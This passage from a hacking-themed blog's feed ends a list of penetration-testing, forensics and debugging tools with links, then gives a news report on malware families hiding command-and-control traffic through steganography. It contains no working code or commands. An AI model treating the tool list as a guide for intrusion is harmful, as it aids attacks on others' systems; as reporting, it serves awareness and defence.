&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.edge-security.com/wfuzz.php&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Wfuzz&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://wapiti.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Wapiti&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://w3af.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;W3af&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Forensics:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;This
refers to tools that are used for computer forensic. They are used in order to
find evidence that is existing in computer systems.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.sleuthkit.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Sleuth
Kit&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.dedoimedo.com/computers/helix.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Helix&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.paterva.com/web6/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Malteg0&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Encase&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Debuggers:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;These
are tools that are used in order to write exploits, reverse engineer binary
files and to analyse malware.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.sourceware.org/gdb/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;GDB&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.immunityinc.com/products-immdbg.shtml&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Immunity Debugger&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Hacking Operating Systems:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;These
are operating systems that have been designed specifically for hackers. These
distros are preloaded with tools that a hacker needs etc.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.backtrack-linux.org/downloads/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Backtrack 5r3&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.kali.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Kali
Linux&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/selinux/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;SELinux&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://knoppix.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Knoppix&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;5.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.backbox.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;BackBox
Linux&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;6.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.pentoo.ch/about&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Pentoo&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;7.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/matriux/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Matriux Krypton&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;8.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.nodezero-linux.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;NodeZero&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;9.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/blackbuntu/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Blackbuntu&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;10.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://samurai.inguardians.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Samurai
Web Testing Framework&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;11.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://weaknetlabs.com/main/?page_id=479&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;WEAKERTH4N&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;12.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.caine-live.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;CAINE
(Computer Aided Investigative Environment)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;13.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.bugtraq-team.com/downloads&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Bugtraq&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;14.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.deftlinux.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;DEFT&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;15.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.e-fense.com/products.php&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Helix&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Other Hacking Tools:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;There
are also other miscellaneous hacking tools that are often used by hackers. They
can’t be put into a particular category, but they are still quite useful.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://netcat.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Netcat&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.yougetsignal.com/tools/visual-tracert/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Traceroute&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://ping.eu/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Ping.eu&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/htdig/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Dig&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;5.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://curl.haxx.se/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;cURL&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/467384333297952070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/12/50-best-hacking-tools.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/467384333297952070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/467384333297952070'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/12/50-best-hacking-tools.html' title='50 Best Hacking Tools!   '/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXpPFeuy_YOVW-ThnKz9lA7b9fxdCcuwF3G1ezqxH5PI5qr_b81L_dRk2Jl0q_r7_pJbV0DYIEk7NqlFmigVIOVJHPvj6xoiP3lqtRvzwF-zM0YZBcQkU146j-TGEEDmCSL9Nb44eZjQ/s72-c/hack+tools.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-8237558604019107934</id><published>2015-11-18T09:21:00.000-08:00</published><updated>2015-11-18T09:21:04.696-08:00</updated><title type='text'>Attackers Embracing Steganography to Hide Communication  </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;margin-bottom: .0001pt; margin: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: blue; font-size: 13.5pt; mso-no-proof: yes; text-decoration: none; text-underline: none;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id=&quot;_x0000_t75&quot;
 coordsize=&quot;21600,21600&quot; o:spt=&quot;75&quot; o:preferrelative=&quot;t&quot; path=&quot;m@4@5l@4@11@9@11@9@5xe&quot;
 filled=&quot;f&quot; stroked=&quot;f&quot;&gt;
 &lt;v:stroke joinstyle=&quot;miter&quot;/&gt;
 &lt;v:formulas&gt;
  &lt;v:f eqn=&quot;if lineDrawn pixelLineWidth 0&quot;/&gt;
  &lt;v:f eqn=&quot;sum @0 1 0&quot;/&gt;
  &lt;v:f eqn=&quot;sum 0 0 @1&quot;/&gt;
  &lt;v:f eqn=&quot;prod @2 1 2&quot;/&gt;
  &lt;v:f eqn=&quot;prod @3 21600 pixelWidth&quot;/&gt;
  &lt;v:f eqn=&quot;prod @3 21600 pixelHeight&quot;/&gt;
  &lt;v:f eqn=&quot;sum @0 0 1&quot;/&gt;
  &lt;v:f eqn=&quot;prod @6 1 2&quot;/&gt;
  &lt;v:f eqn=&quot;prod @7 21600 pixelWidth&quot;/&gt;
  &lt;v:f eqn=&quot;sum @8 21600 0&quot;/&gt;
  &lt;v:f eqn=&quot;prod @7 21600 pixelHeight&quot;/&gt;
  &lt;v:f eqn=&quot;sum @10 21600 0&quot;/&gt;
 &lt;/v:formulas&gt;
 &lt;v:path o:extrusionok=&quot;f&quot; gradientshapeok=&quot;t&quot; o:connecttype=&quot;rect&quot;/&gt;
 &lt;o:lock v:ext=&quot;edit&quot; aspectratio=&quot;t&quot;/&gt;
&lt;/v:shapetype&gt;&lt;v:shape id=&quot;Picture_x0020_1&quot; o:spid=&quot;_x0000_i1025&quot; type=&quot;#_x0000_t75&quot;
 alt=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVp9qglV2E9PtR6Ws28PMkh-ZbBsywqsZcI6otv-J0oTI2WYogn6kjtC06ydSRDAQ5BhcP3D5mjiy1NNtLGrrKVQ0mQTVGe_iy4Jh1-x8uDo9ACYNGv-YsSF-shFvLVKm0j-304f0szXQ/s640/shutterstock_228162115-680x400.jpg&quot;
 href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVp9qglV2E9PtR6Ws28PMkh-ZbBsywqsZcI6otv-J0oTI2WYogn6kjtC06ydSRDAQ5BhcP3D5mjiy1NNtLGrrKVQ0mQTVGe_iy4Jh1-x8uDo9ACYNGv-YsSF-shFvLVKm0j-304f0szXQ/s1600/shutterstock_228162115-680x400.jpg&quot;
 style=&#39;width:480pt;height:282pt;visibility:visible;mso-wrap-style:square&#39;
 o:button=&quot;t&quot;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\Avles\AppData\Local\Temp\msohtmlclip1\01\clip_image001.jpg&quot;
  o:title=&quot;shutterstock_228162115-680x400&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiS8VKiHJWQY8Z8Sma4DZWO5LC1n3AgZvJo4fI595yd2lIl37DQlh3Cd46Ix8kVsEwXcKanN2RzoWkHah1vA8NOrLuSmvfbvGO0hPHMHkV40N-ZbKSIaMhjMCr3GsotHt3J2H1TvaMsU0/s1600/shutterstock_228162115-680x400.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiS8VKiHJWQY8Z8Sma4DZWO5LC1n3AgZvJo4fI595yd2lIl37DQlh3Cd46Ix8kVsEwXcKanN2RzoWkHah1vA8NOrLuSmvfbvGO0hPHMHkV40N-ZbKSIaMhjMCr3GsotHt3J2H1TvaMsU0/s320/shutterstock_228162115-680x400.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Encouraged
by patterns carried out on a larger scale recently, researchers believe digital
steganography has arrived as a legitimate method for attackers to use when it
comes to obscuring communication between command and control servers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin-bottom: 7.5pt; margin-left: 0cm; margin-right: 0cm; margin-top: 0cm; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;In
a presentation last week at Black Hat Europe researchers with Crowdstrike and
Dell SecureWorks cited a handful of campaigns that depend on steganography that
have flourished lately.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin-bottom: 7.5pt; margin-left: 0cm; margin-right: 0cm; margin-top: 0cm; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Steganography,
or the art of hiding information inside media, isn’t a particularly new
concept, but the researchers claim that malware programmers and operators
appear taken with the technique as of late.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Pierre-Marc
Bureau, a senior security researcher at Dell SecureWorks and Dr. Christian
Dietrich, a senior researcher with Crowdstrike, say one of the most recent
examples can be found in an instance of “Foreign,” a DDoS tool the two looked
at recently which relies on messages hidden in HTTP error messages. The tool
parses the page, which appears to be a generic 404 page at first glance, but
actually contains a C2 command, hidden from the human eye.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;The
command – encoded using Base64 and stored between HTML comment tags – prompts
the bot to download a file from a given URL.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;The
tool is the latest entry to a growing field of malware that excels at
communicating via a stealthy C2 channel.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Again,
Bureau and Dietrich insist the technique as a whole isn’t new, but that the
method has grown more sophisticated lately. The two also discussed how three
malware families – Lurk, Gozi, and Stegoloader – have also leveraged the
technique over the past several years.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Lurk,
malware that downloads click fraud malware, was spotted in 2014 hiding the URL
where it grabs content from in a .BMP image. Gozi, known for perpetrating bank
fraud, began using steganography at the beginning of this year “as a backup
mechanism to retrieve URLs where it could download its configuration file.” The
malware encrypts information in a favicon.ico file hosted on TOR.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;Researchers
with SecureWorks first described the Stegoloader malware, which operates in a
similar fashion to Lurk, earlier this year. The malware relies on a deployment
module that grabs a PNG file that contains malware. Once dropped, the malware
is mostly used to steal system information but can also be used to load
additional modules that access documents, list installed programs, steal
browser history, &amp;nbsp;and drop more malware that steals passwords, Pony.&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background: white; margin: 0cm 0cm 7.5pt; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 13.5pt;&quot;&gt;&quot;Distrust
and caution are the parents of security&quot; - Benjamin Franklin&lt;/span&gt;&lt;span style=&quot;font-size: 13.5pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;









































&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/8237558604019107934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/attackers-embracing-steganography-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/8237558604019107934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/8237558604019107934'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/attackers-embracing-steganography-to.html' title='Attackers Embracing Steganography to Hide Communication  '/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 